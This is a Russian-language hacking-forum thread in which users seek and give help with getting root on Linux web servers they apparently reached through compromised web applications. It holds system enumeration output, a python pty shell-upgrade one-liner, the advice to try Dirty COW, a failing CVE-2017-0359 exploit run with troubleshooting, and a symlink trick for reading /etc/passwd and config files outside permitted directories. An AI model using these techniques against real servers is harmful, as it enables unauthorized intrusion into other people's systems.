ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.03.2017, 19:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
60408
Репутация:
0
|
|
Спасибо!
Сообщение от VY_CMa
VY_CMa said:
↑
Там ничего не отключили.
spawn через python:
Код:
Code:
python -c 'import pty; pty.spawn("/bin/sh")'
Сейчас нет возможности, но в ближайшем времени доберусь до сервера и попробую, как Вы посоветовали. Отпишусь в этом посте.
Фак май моск, сработало!!!
Вы красава, Вам плюсик :3 |
|
|
|
10.04.2017, 18:11
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Парни, подскажите что можно попробовать.
uname -a
Код:
Code:
Linux web1 2.6.32-26-pve #1 SMP Mon Oct 14 08:22:20 CEST 2013 i686 GNU/Linux
ls -la /boot
Код:
Code:
drwxr-xr-x 2 root root 4096 Jan 9 2010 .
drwxr-xr-x 20 root root 4096 Aug 7 2016 ..
-rw-r--r-- 1 root root 103204 Sep 28 2007 memtest86+.bin
ls -la --full-time /lib
Код:
Code:
drwxr-xr-x 13 root root 4096 2012-12-17 17:33:14.000000000 +0100 .
drwxr-xr-x 20 root root 4096 2016-08-07 20:50:02.414264805 +0200 ..
lrwxrwxrwx 1 root root 21 2010-03-02 18:37:34.000000000 +0100 cpp -> /etc/
alternatives/cpp
drwxr-xr-x 2 root root 4096 2011-08-22 15:45:21.000000000 +0200 dhcp3-client
drwxr-xr-x 2 root root 4096 2009-04-14 23:44:58.000000000 +0200 firmware
drwxr-xr-x 2 root root 4096 2009-08-18 02:49:39.000000000 +0200 i486-linux-g
nu
drwxr-xr-x 2 root root 4096 2016-05-29 18:40:22.466740561 +0200 init
drwxr-xr-x 2 root root 4096 2010-01-09 18:03:47.000000000 +0100 iptables
-rwxr-xr-x 1 root root 64612 2010-01-20 10:21:10.000000000 +0100 klibc-B9LS-G
jx2D7BYcbQig0RlgHKO9Y.so
-rwxr-xr-x 1 root root 109152 2012-12-15 20:01:15.000000000 +0100 ld-2.7.so
lrwxrwxrwx 1 root root 9 2012-12-17 17:33:13.000000000 +0100 ld-linux.so.
2 -> ld-2.7.so
-rw-r--r-- 1 root root 5440 2012-12-15 20:01:15.000000000 +0100 libBrokenLoc
ale-2.7.so
lrwxrwxrwx 1 root root 22 2012-12-17 17:33:13.000000000 +0100 libBrokenLoc
ale.so.1 -> libBrokenLocale-2.7.so
-rw-r--r-- 1 root root 13696 2012-12-15 20:01:15.000000000 +0100 libSegFault.
so
lrwxrwxrwx 1 root root 15 2010-03-02 18:37:33.000000000 +0100 libacl.so.1
-> libacl.so.1.1.0
-rw-r--r-- 1 root root 22544 2007-11-14 11:59:18.000000000 +0100 libacl.so.1.
1.0
-rw-r--r-- 1 root root 9804 2012-12-15 20:01:15.000000000 +0100 libanl-2.7.s
o
lrwxrwxrwx 1 root root 13 2012-12-17 17:33:13.000000000 +0100 libanl.so.1
-> libanl-2.7.so
lrwxrwxrwx 1 root root 15 2010-03-02 18:37:33.000000000 +0100 libatm.so.1
-> libatm.so.1.0.0
-rw-r--r-- 1 root root 32224 2007-08-14 22:27:59.000000000 +0200 libatm.so.1.
0.0
lrwxrwxrwx 1 root root 16 2010-03-02 18:37:33.000000000 +0100 libattr.so.1
-> libattr.so.1.1.0
-rw-r--r-- 1 root root 13592 2007-10-31 23:45:11.000000000 +0100 libattr.so.1
.1.0
lrwxrwxrwx 1 root root 15 2010-03-02 18:37:33.000000000 +0100 libblkid.so.
1 -> libblkid.so.1.0
-rw-r--r-- 1 root root 36964 2008-03-27 18:25:48.000000000 +0100 libblkid.so.
1.0
lrwxrwxrwx 1 root root 15 2011-12-29 11:24:57.000000000 +0100 libbz2.so.1
-> libbz2.so.1.0.4
lrwxrwxrwx 1 root root 15 2011-12-29 11:24:57.000000000 +0100 libbz2.so.1.
0 -> libbz2.so.1.0.4
-rw-r--r-- 1 root root 66276 2011-12-12 23:40:54.000000000 +0100 libbz2.so.1.
0.4
-rwxr-xr-x 1 root root 1294572 2012-12-15 20:01:15.000000000 +0100 libc-2.7.so
lrwxrwxrwx 1 root root 11 2012-12-17 17:33:13.000000000 +0100 libc.so.6 ->
libc-2.7.so
lrwxrwxrwx 1 root root 14 2010-03-02 18:37:33.000000000 +0100 libcap.so.1
-> libcap.so.1.10
-rw-r--r-- 1 root root 10316 2007-07-31 21:20:19.000000000 +0200 libcap.so.1.
10
lrwxrwxrwx 1 root root 17 2010-03-02 18:37:33.000000000 +0100 libcfont.so.
0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 11512 2008-02-06 23:49:54.000000000 +0100 libcfont.so.
0.0.0
-rw-r--r-- 1 root root 181724 2012-12-15 20:01:15.000000000 +0100 libcidn-2.7.
so
lrwxrwxrwx 1 root root 14 2012-12-17 17:33:13.000000000 +0100 libcidn.so.1
-> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 2010-03-02 18:37:32.000000000 +0100 libcom_err.s
o.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 7444 2008-03-27 18:25:48.000000000 +0100 libcom_err.s
o.2.1
lrwxrwxrwx 1 root root 19 2010-03-02 18:37:33.000000000 +0100 libconsole.s
o.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 73312 2008-02-06 23:49:54.000000000 +0100 libconsole.s
o.0.0.0
-rw-r--r-- 1 root root 38300 2012-12-15 20:01:15.000000000 +0100 libcrypt-2.7
.so
lrwxrwxrwx 1 root root 15 2012-12-17 17:33:13.000000000 +0100 libcrypt.so.
1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 2010-03-02 18:37:32.000000000 +0100 libctutils.s
o.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 17424 2008-02-06 23:49:54.000000000 +0100 libctutils.s
o.0.0.0
-rw-r--r-- 1 root root 85108 2007-12-12 20:25:16.000000000 +0100 libdevmapper
.so.1.02.1
-rw-r--r-- 1 root root 9684 2012-12-15 20:01:15.000000000 +0100 libdl-2.7.so
lrwxrwxrwx 1 root root 12 2012-12-17 17:33:13.000000000 +0100 libdl.so.2 -
> libdl-2.7.so
lrwxrwxrwx 1 root root 13 2010-03-02 18:37:32.000000000 +0100 libe2p.so.2
-> libe2p.so.2.3
-rw-r--r-- 1 root root 20052 2008-03-27 18:25:48.000000000 +0100 libe2p.so.2.
3
lrwxrwxrwx 1 root root 16 2010-03-02 18:37:33.000000000 +0100 libext2fs.so
.2 -> libext2fs.so.2.4
-rw-r--r-- 1 root root 142792 2008-03-27 18:25:48.000000000 +0100 libext2fs.so
.2.4
lrwxrwxrwx 1 root root 16 2011-03-03 13:04:15.000000000 +0100 libfuse.so.2
-> libfuse.so.2.7.2
-rw-r--r-- 1 root root 102816 2011-02-11 21:45:09.000000000 +0100 libfuse.so.2
.7.2
-rw-r--r-- 1 root root 42700 2009-02-19 11:39:17.000000000 +0100 libgcc_s.so.
1
lrwxrwxrwx 1 root root 19 2010-03-02 18:37:32.000000000 +0100 libgcrypt.so
.11 -> libgcrypt.so.11.2.3
-rw-r--r-- 1 root root 310956 2007-12-07 12:34:06.000000000 +0100 libgcrypt.so
.11.2.3
lrwxrwxrwx 1 root root 21 2010-03-02 18:37:33.000000000 +0100 libgpg-error
.so.0 -> libgpg-error.so.0.3.0
-rw-r--r-- 1 root root 11468 2007-11-16 01:56:41.000000000 +0100 libgpg-error
.so.0.3.0
lrwxrwxrwx 1 root root 17 2010-03-02 18:37:33.000000000 +0100 libhistory.s
o.5 -> libhistory.so.5.2
-rw-r--r-- 1 root root 27188 2007-10-02 16:35:06.000000000 +0200 libhistory.s
o.5.2
-rw-r--r-- 1 root root 27444 2007-12-21 15:36:58.000000000 +0100 libiw.so.29
-rw-r--r-- 1 root root 5644 2007-10-24 04:37:31.000000000 +0200 libkeyutils-
1.2.so
lrwxrwxrwx 1 root root 18 2010-03-02 18:37:32.000000000 +0100 libkeyutils.
so.1 -> libkeyutils-1.2.so
-rw-r--r-- 1 root root 145232 2012-12-15 20:01:15.000000000 +0100 libm-2.7.so
lrwxrwxrwx 1 root root 11 2012-12-17 17:33:13.000000000 +0100 libm.so.6 ->
libm-2.7.so
-rw-r--r-- 1 root root 13696 2012-12-15 20:01:15.000000000 +0100 libmemusage.
so
lrwxrwxrwx 1 root root 17 2010-03-02 18:37:32.000000000 +0100 libncurses.s
o.5 -> libncurses.so.5.6
-rw-r--r-- 1 root root 190584 2008-02-24 00:38:14.000000000 +0100 libncurses.s
o.5.6
lrwxrwxrwx 1 root root 18 2010-03-02 18:37:32.000000000 +0100 libncursesw.
so.5 -> libncursesw.so.5.6
-rw-r--r-- 1 root root 236568 2008-02-24 00:38:14.000000000 +0100 libncursesw.
so.5.6
-rw-r--r-- 1 root root 79612 2012-12-15 20:01:15.000000000 +0100 libnsl-2.7.s
o
lrwxrwxrwx 1 root root 13 2012-12-17 17:33:13.000000000 +0100 libnsl.so.1
-> libnsl-2.7.so
-rw-r--r-- 1 root root 26340 2012-12-15 20:01:15.000000000 +0100 libnss_compa
t-2.7.so
lrwxrwxrwx 1 root root 20 2012-12-17 17:33:13.000000000 +0100 libnss_compa
t.so.2 -> libnss_compat-2.7.so
-rw-r--r-- 1 root root 17884 2012-12-15 20:01:15.000000000 +0100 libnss_dns-2
.7.so
lrwxrwxrwx 1 root root 17 2012-12-17 17:33:13.000000000 +0100 libnss_dns.s
o.2 -> libnss_dns-2.7.so
-rw-r--r-- 1 root root 38412 2012-12-15 20:01:15.000000000 +0100 libnss_files
-2.7.so
lrwxrwxrwx 1 root root 19 2012-12-17 17:33:13.000000000 +0100 libnss_files
.so.2 -> libnss_files-2.7.so
-rw-r--r-- 1 root root 17900 2012-12-15 20:01:15.000000000 +0100 libnss_hesio
d-2.7.so
lrwxrwxrwx 1 root root 20 2012-12-17 17:33:13.000000000 +0100 libnss_hesio
d.so.2 -> libnss_hesiod-2.7.so
-rw-r--r-- 1 root root 34352 2012-12-15 20:01:15.000000000 +0100 libnss_nis-2
.7.so
lrwxrwxrwx 1 root root 17 2012-12-17 17:33:13.000000000 +0100 libnss_nis.s
o.2 -> libnss_nis-2.7.so
-rw-r--r-- 1 root root 42508 2012-12-15 20:01:15.000000000 +0100 libnss_nispl
us-2.7.so
lrwxrwxrwx 1 root root 21 2012-12-17 17:33:13.000000000 +0100 libnss_nispl
us.so.2 -> libnss_nisplus-2.7.so
lrwxrwxrwx 1 root root 20 2010-03-02 18:37:32.000000000 +0100 libntfs-3g.s
o.23 -> libntfs-3g.so.23.0.0
-rw-r--r-- 1 root root 182804 2008-07-10 12:19:22.000000000 +0200 libntfs-3g.s
o.23.0.0
lrwxrwxrwx 1 root root 16 2011-11-10 22:29:24.000000000 +0100 libpam.so.0
-> libpam.so.0.81.6
-rw-r--r-- 1 root root 37956 2011-10-18 17:37:36.000000000 +0200 libpam.so.0.
81.6
lrwxrwxrwx 1 root root 21 2011-11-10 22:29:24.000000000 +0100 libpam_misc.
so.0 -> libpam_misc.so.0.81.2
-rw-r--r-- 1 root root 8520 2011-10-18 17:37:36.000000000 +0200 libpam_misc.
so.0.81.2
lrwxrwxrwx 1 root root 17 2011-11-10 22:29:24.000000000 +0100 libpamc.so.0
-> libpamc.so.0.81.0
-rw-r--r-- 1 root root 9028 2011-10-18 17:37:36.000000000 +0200 libpamc.so.0
.81.0
lrwxrwxrwx 1 root root 22 2010-03-02 18:37:33.000000000 +0100 libparted-1.
7.so.1 -> libparted-1.7.so.1.0.0
-rw-r--r-- 1 root root 388784 2009-06-05 11:42:39.000000000 +0200 libparted-1.
7.so.1.0.0
-rw-r--r-- 1 root root 5444 2012-12-15 20:01:15.000000000 +0100 libpcprofile
.so
lrwxrwxrwx 1 root root 16 2010-03-02 18:37:33.000000000 +0100 libpopt.so.0
-> libpopt.so.0.0.0
-rw-r--r-- 1 root root 27144 2007-03-07 22:46:19.000000000 +0100 libpopt.so.0
.0.0
-rw-r--r-- 1 root root 49096 2008-07-10 11:28:34.000000000 +0200 libproc-3.2.
7.so
-rwxr-xr-x 1 root root 112174 2012-12-15 20:01:20.000000000 +0100 libpthread-2
.7.so
lrwxrwxrwx 1 root root 17 2012-12-17 17:33:13.000000000 +0100 libpthread.s
o.0 -> libpthread-2.7.so
lrwxrwxrwx 1 root root 18 2010-03-02 18:37:33.000000000 +0100 libreadline.
so.5 -> libreadline.so.5.2
-rw-r--r-- 1 root root 196560 2007-10-02 16:35:06.000000000 +0200 libreadline.
so.5.2
-rw-r--r-- 1 root root 59216 2012-12-15 20:01:15.000000000 +0100 libresolv-2.
7.so
lrwxrwxrwx 1 root root 16 2012-12-17 17:33:13.000000000 +0100 libresolv.so
.2 -> libresolv-2.7.so
-rw-r--r-- 1 root root 30624 2012-12-15 20:01:15.000000000 +0100 librt-2.7.so
lrwxrwxrwx 1 root root 12 2012-12-17 17:33:13.000000000 +0100 librt.so.1 -
> librt-2.7.so
-rw-r--r-- 1 root root 95948 2008-02-29 23:29:19.000000000 +0100 libselinux.s
o.1
-rw-r--r-- 1 root root 207284 2008-03-01 06:21:06.000000000 +0100 libsepol.so.
1
lrwxrwxrwx 1 root root 17 2010-03-02 18:37:32.000000000 +0100 libslang.so.
2 -> libslang.so.2.1.3
-rw-r--r-- 1 root root 686384 2007-11-28 14:54:47.000000000 +0100 libslang.so.
2.1.3
lrwxrwxrwx 1 root root 12 2010-03-02 18:37:33.000000000 +0100 libss.so.2 -
> libss.so.2.0
-rw-r--r-- 1 root root 18648 2008-03-27 18:25:48.000000000 +0100 libss.so.2.0
lrwxrwxrwx 1 root root 17 2010-03-02 18:37:33.000000000 +0100 libsysfs.so.
2 -> libsysfs.so.2.0.1
-rw-r--r-- 1 root root 37784 2008-04-01 19:03:20.000000000 +0200 libsysfs.so.
2.0.1
-rw-r--r-- 1 root root 26284 2012-12-15 20:01:15.000000000 +0100 libthread_db
-1.0.so
lrwxrwxrwx 1 root root 19 2012-12-17 17:33:13.000000000 +0100 libthread_db
.so.1 -> libthread_db-1.0.so
lrwxrwxrwx 1 root root 13 2010-03-02 18:37:32.000000000 +0100 libtic.so.5
-> libtic.so.5.6
-rw-r--r-- 1 root root 69952 2008-02-24 00:38:14.000000000 +0100 libtic.so.5.
6
lrwxrwxrwx 1 root root 14 2010-03-02 18:37:32.000000000 +0100 libticw.so.5
-> libticw.so.5.6
-rw-r--r-- 1 root root 69952 2008-02-24 00:38:14.000000000 +0100 libticw.so.5
.6
lrwxrwxrwx 1 root root 20 2011-03-03 13:04:15.000000000 +0100 libulockmgr.
so.1 -> libulockmgr.so.1.0.1
-rw-r--r-- 1 root root 7836 2011-02-11 21:45:09.000000000 +0100 libulockmgr.
so.1.0.1
lrwxrwxrwx 1 root root 19 2010-03-02 18:37:33.000000000 +0100 libusb-0.1.s
o.4 -> libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root 29056 2007-11-23 10:47:27.000000000 +0100 libusb-0.1.s
o.4.4.4
-rw-r--r-- 1 root root 9696 2012-12-15 20:01:15.000000000 +0100 libutil-2.7.
so
lrwxrwxrwx 1 root root 14 2012-12-17 17:33:13.000000000 +0100 libutil.so.1
-> libutil-2.7.so
lrwxrwxrwx 1 root root 14 2010-03-02 18:37:33.000000000 +0100 libuuid.so.1
-> libuuid.so.1.2
-rw-r--r-- 1 root root 13188 2008-03-27 18:25:48.000000000 +0100 libuuid.so.1
.2
lrwxrwxrwx 1 root root 22 2010-03-02 18:37:32.000000000 +0100 libvolume_id
.so.0 -> libvolume_id.so.0.81.0
-rw-r--r-- 1 root root 27864 2009-04-14 23:45:06.000000000 +0200 libvolume_id
.so.0.81.0
lrwxrwxrwx 1 root root 16 2010-03-02 18:37:33.000000000 +0100 libwrap.so.0
-> libwrap.so.0.7.6
-rw-r--r-- 1 root root 31304 2007-07-30 10:19:43.000000000 +0200 libwrap.so.0
.7.6
drwxr-xr-x 2 root root 4096 2010-01-09 18:01:57.000000000 +0100 lsb
drwxr-xr-x 2 root root 4096 2008-10-06 14:51:29.000000000 +0200 modules
drwxr-xr-x 2 root root 4096 2011-11-10 22:29:15.000000000 +0100 security
drwxr-xr-x 15 root root 4096 2008-02-24 00:38:00.000000000 +0100 terminfo
drwxr-xr-x 3 root root 4096 2010-01-09 18:02:34.000000000 +0100 tls
drwxr-xr-x 3 root root 4096 2011-01-21 16:23:48.000000000 +0100 udev
mount
Код:
Code:
/dev/simfs on / type simfs (rw,relatime)
/dev/mapper/pve-web1home on /home type ext4 (rw,noatime,relatime,barrier=1,data=
ordered)
proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
tmpfs on /var/run type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)
tmpfs on /var/lock type tmpfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,relatime)
devpts on /dev/pts type devpts (rw,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /var/run type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)
tmpfs on /var/lock type tmpfs (rw,nosuid,nodev,noexec,relatime)
cat /etc/issue
Код:
Code:
Ubuntu 8.04.4 LTS \n \l
cat /etc/crontab
Код:
Code:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
50 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/c
ron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/c
ron.weekly )
52 6 15 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/
cron.monthly )
cat /proc/version
Код:
Code:
Linux version 2.6.32-26-pve (root@lola) (gcc version 4.7.2 (Debian 4.7.2-5) ) #1
SMP Mon Oct 14 08:22:20 CEST 2013
cat /proc/sys/vm/mmap_min_addr
ls -la /usr/bin/staprun
Код:
Code:
ls: cannot access /usr/bin/staprun: No such file or directory
find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
Код:
Code:
-rwsr-xr-x 1 root root 9624 Dec 15 2012 /usr/lib/pt_chown
-rwsr-xr-- 1 root messagebus 228628 Oct 3 2012 /usr/lib/dbus-1.0/dbus-daemon-l
aunch-helper
-rwsr-xr-x 1 root root 4588 Aug 23 2008 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root www-data 10276 Mar 8 2013 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 168340 Mar 8 2011 /usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
-rwsr-xr-x 2 root root 108068 Feb 27 2013 /usr/bin/sudoedit
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
-rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X
-rwsr-xr-x 2 root root 108068 Feb 27 2013 /usr/bin/sudo
-rwsr-xr-x 1 root root 37360 Dec 8 2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 12296 Dec 10 2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 11048 Dec 10 2007 /usr/bin/arping
-rwsr-xr-x 1 root root 23952 Dec 8 2008 /usr/bin/chsh
-rwsr-xr-x 1 root root 28624 Dec 8 2008 /usr/bin/chfn
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwsr-xr-x 1 root root 19144 Dec 8 2008 /usr/bin/newgrp
-rwsr-xr-x 1 root root 29104 Dec 8 2008 /usr/bin/passwd
|
|
|
10.04.2017, 18:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
17650
Репутация:
0
|
|
Сообщение от .:[melkiy
:."]
.:[melkiy]:. said:
↑
Парни, подскажите что можно попробовать.
uname -a
Код:
Code:
Linux web1 2.6.32-26-pve #1 SMP Mon Oct 14 08:22:20 CEST 2013 i686 GNU/Linux
Пробуй dirtyc0w
|
|
|
|
11.04.2017, 00:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
60408
Репутация:
0
|
|
Сообщение от .:[melkiy
:."]
.:[melkiy]:. said:
↑
Парни, подскажите что можно попробовать.
uname -a
Код:
Code:
Linux web1 2.6.32-26-pve #1 SMP Mon Oct 14 08:22:20 CEST 2013 i686 GNU/Linux
[/code] dirty c0w
|
|
|
|
23.05.2017, 01:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
60408
Репутация:
0
|
|
парни, поясните пожалуйста, как работает сплоит, и почему он у меня не работает?
http://0day.today/exploit/26893
Код:
Code:
/bin/bash ./d9.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ CVE-2017-0359, PoC by Kristian Erik Hermansen @
@ ntfs-3g local privilege escalation to root @
@ Credits to Google Project Zero @
@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @
@ Tested: Debian 9 (Stretch) @
@ Date: 2017-02-03 @
@ Link: https://goo.gl/A9I8Vq @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@[*] Gathering environment info ...[*] Creating kernel hijack directories ...[*] Forging symlinks ...
ln: failed to create symbolic link `/var/www/alfavito/modules/template/templates/lib/modules\r/2.6.32-openvz-042stab120.16-amd64\r\r': No such file or directory
ln: failed to create symbolic link `/var/www/alfavito/modules/template/templates/kernel/fs\r/fuse\r': No such file or directory[*] Pulling in deps ...[*] Building kernel module ...
./d9.sh: line 25: $'\r': command not found
./d9.sh: line 64: warning: here-document at line 26 delimited by end-of-file (wanted `EOF')
|
|
|
|
31.05.2017, 20:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
187765
Репутация:
154
|
|
Сообщение от ACat
ACat said:
↑
парни, поясните пожалуйста, как работает сплоит, и почему он у меня не работает?
http://0day.today/exploit/26893
Код:
Code:
/bin/bash ./d9.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ CVE-2017-0359, PoC by Kristian Erik Hermansen @
@ ntfs-3g local privilege escalation to root @
@ Credits to Google Project Zero @
@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @
@ Tested: Debian 9 (Stretch) @
@ Date: 2017-02-03 @
@ Link: https://goo.gl/A9I8Vq @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@[*] Gathering environment info ...[*] Creating kernel hijack directories ...[*] Forging symlinks ...
ln: failed to create symbolic link `/var/www/alfavito/modules/template/templates/lib/modules\r/2.6.32-openvz-042stab120.16-amd64\r\r': No such file or directory
ln: failed to create symbolic link `/var/www/alfavito/modules/template/templates/kernel/fs\r/fuse\r': No such file or directory[*] Pulling in deps ...[*] Building kernel module ...
./d9.sh: line 25: $'\r': command not found
./d9.sh: line 64: warning: here-document at line 26 delimited by end-of-file (wanted `EOF')
Судя по логу сплоит создает так называемые именованные ссылки (symlink). Это большая уязвимость в юникс системах, так как ссылка создана пользователем и сответственно есть права её читать. Помню был сценарий атаки когда с помощью rsync'a мы заливали ссылку и читали файлы конфига веб сервера и прочее. ln -s /etc/passwd /asd потом просто читаешь cat asd - таким образом часто байпассятся привелегии и есть возможность читать файлы за пределами допустимой диры. А ошибка простая, пытается создать ссылку на несуществующий файл.
|
|
|
|
01.06.2017, 15:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
94763
Репутация:
6
|
|
есть физический доступ к машине win10 пользователь юзер возможности вставить диск или флешку нету
|
|
|
|
02.06.2017, 17:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
60408
Репутация:
0
|
|
Сообщение от SooLFaa
SooLFaa said:
↑
Судя по логу сплоит создает так называемые именованные ссылки (symlink). Это большая уязвимость в юникс системах, так как ссылка создана пользователем и сответственно есть права её читать. Помню был сценарий атаки когда с помощью rsync'a мы заливали ссылку и читали файлы конфига веб сервера и прочее. ln -s /etc/passwd /asd потом просто читаешь cat asd - таким образом часто байпассятся привелегии и есть возможность читать файлы за пределами допустимой диры. А ошибка простая, пытается создать ссылку на несуществующий файл. Сэр, а как проверить сервер на уязвимость последним векторам атак?
|
|
|
|
02.06.2017, 17:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
187765
Репутация:
154
|
|
Сообщение от ACat
ACat said:
↑
Сэр, а как проверить сервер на уязвимость последним векторам атак? Для unix систем есть шикарный скрипт
UPD: А так пробовать их все.
|
|
|
|
05.06.2017, 14:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
60408
Репутация:
0
|
|
uname -a
Код:
Code:
Linux winetime.ellyt.com 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64 GNU/Linux
sh-4.3$ ls -la /boot
Код:
Code:
total 20512
drwxr-xr-x 3 root root 4096 Jun 1 08:25 .
drwxr-xr-x 23 root root 4096 Jun 1 09:11 ..
-rw-r--r-- 1 root root 2681172 Mar 8 01:59 System.map-3.16.0-4-amd64
-rw-r--r-- 1 root root 157815 Mar 8 01:59 config-3.16.0-4-amd64
drwxr-xr-x 5 root root 4096 Apr 6 11:52 grub
-rw-r--r-- 1 root root 15017568 Jun 1 08:25 initrd.img-3.16.0-4-amd64
-rw-r--r-- 1 root root 3128784 Mar 8 01:58 vmlinuz-3.16.0-4-amd64
ls -la --full-time /lib
Код:
Code:
total 280
drwxr-xr-x 16 root root 4096 2017-06-01 08:24:38.147095248 +0300 .
drwxr-xr-x 23 root root 4096 2017-06-01 09:11:13.863704998 +0300 ..
lrwxrwxrwx 1 root root 21 2017-04-07 21:12:08.155124000 +0300 cpp -> /etc/alternatives/cpp
drwxr-xr-x 2 root root 4096 2017-04-06 11:11:32.822435000 +0300 discover
drwxr-xr-x 2 root root 4096 2017-04-06 11:08:06.370435000 +0300 ifupdown
drwxr-xr-x 2 root root 4096 2017-04-06 11:07:50.358435000 +0300 init
-rwxr-xr-x 1 root root 71416 2014-10-05 04:01:50.000000000 +0300 klibc-IpHGKKbZiB_yZ7GPagmQz2GwVAQ.so
lrwxrwxrwx 1 root root 17 2014-11-08 19:03:39.000000000 +0200 libip4tc.so.0 -> libip4tc.so.0.1.0
-rw-r--r-- 1 root root 31416 2014-11-08 19:03:41.000000000 +0200 libip4tc.so.0.1.0
lrwxrwxrwx 1 root root 17 2014-11-08 19:03:39.000000000 +0200 libip6tc.so.0 -> libip6tc.so.0.1.0
-rw-r--r-- 1 root root 31416 2014-11-08 19:03:41.000000000 +0200 libip6tc.so.0.1.0
lrwxrwxrwx 1 root root 15 2014-11-08 19:03:39.000000000 +0200 libipq.so.0 -> libipq.so.0.0.0
-rw-r--r-- 1 root root 10544 2014-11-08 19:03:41.000000000 +0200 libipq.so.0.0.0
lrwxrwxrwx 1 root root 16 2014-11-08 19:03:39.000000000 +0200 libiptc.so.0 -> libiptc.so.0.0.0
-rw-r--r-- 1 root root 5816 2014-11-08 19:03:41.000000000 +0200 libiptc.so.0.0.0
lrwxrwxrwx 1 root root 20 2014-11-08 19:03:39.000000000 +0200 libxtables.so.10 -> libxtables.so.10.0.0
-rw-r--r-- 1 root root 51896 2014-11-08 19:03:42.000000000 +0200 libxtables.so.10.0.0
drwxr-xr-x 3 root root 4096 2017-04-06 11:07:50.206435000 +0300 lsb
drwxr-xr-x 2 root root 4096 2017-04-06 11:08:07.734435000 +0300 modprobe.d
drwxr-xr-x 3 root root 4096 2017-04-06 11:08:31.846435000 +0300 modules
drwxr-xr-x 2 root root 4096 2017-06-01 08:24:38.227099822 +0300 modules-load.d
drwxr-xr-x 2 root root 4096 2017-04-06 11:07:50.270435000 +0300 startpar
drwxr-xr-x 8 root root 4096 2017-04-06 11:07:55.662435000 +0300 systemd
drwxr-xr-x 15 root root 4096 2017-04-06 11:07:27.242435000 +0300 terminfo
drwxr-xr-x 4 root root 4096 2017-04-06 11:08:00.966435000 +0300 udev
drwxr-xr-x 2 root root 4096 2017-04-22 18:39:02.116227245 +0300 ufw
drwxr-xr-x 4 root root 12288 2017-06-01 08:24:52.967942493 +0300 x86_64-linux-gnu
drwxr-xr-x 2 root root 4096 2017-04-06 11:08:07.490435000 +0300 xtables
ls -la --full-time /lib64
Код:
Code:
total 8
drwxr-xr-x 2 root root 4096 2017-04-06 11:07:37.814435000 +0300 .
drwxr-xr-x 23 root root 4096 2017-06-01 09:11:13.863704998 +0300 ..
lrwxrwxrwx 1 root root 32 2016-11-28 06:26:42.000000000 +0200 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so
mount
Код:
Code:
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=255197,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,relatime,size=411712k,mode=755)
/dev/sda2 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
